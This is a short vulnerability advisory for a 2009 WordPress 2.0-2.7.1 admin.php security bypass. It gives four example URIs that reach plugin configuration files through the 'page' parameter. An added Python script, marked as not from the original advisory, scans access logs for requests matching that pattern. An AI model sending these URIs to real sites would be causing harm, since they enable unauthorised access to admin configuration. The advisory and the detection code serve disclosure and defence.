
# Title : WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability
# Published : 2009-11-10
# Author : Fernando Arnaboldi


An attacker can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php
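
For reviewing access logs, the following added example (not part of the original advisory) lists requests to `wp-admin/admin.php` whose `page` parameter names a file path, the pattern shared by the example URIs above. The combined log format, the function name and the sample lines are assumptions made for this example; the log does not show which account made a request, so each hit still has to be compared against known administrator sessions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def plugin_page_requests(log_lines):
    """Return (ip, status, page) for admin.php requests whose `page`
    parameter names a file path, as in the advisory's example URIs."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes, so page=akismet%2Freadme.txt is caught too.
        for page in parse_qs(url.query).get("page", []):
            # Heuristic (assumption): a directory separator plus a file extension.
            if "/" in page and re.search(r"\.[A-Za-z0-9]+$", page):
                hits.append((m.group("ip"), int(m.group("status")), page))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2009:10:00:01 +0000] "GET /wp-admin/admin.php?page=akismet/readme.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2009:10:00:05 +0000] "GET /wp-admin/admin.php?page=wp-security-scan%2Fsecurityscan.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Nov/2009:10:01:00 +0000] "GET /wp-admin/admin.php?page=stats HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Nov/2009:10:02:00 +0000] "GET /index.php?page=akismet/readme.txt HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, page in plugin_page_requests(SAMPLE_LOG):
        print(f"{ip} status={status} page={page}")
```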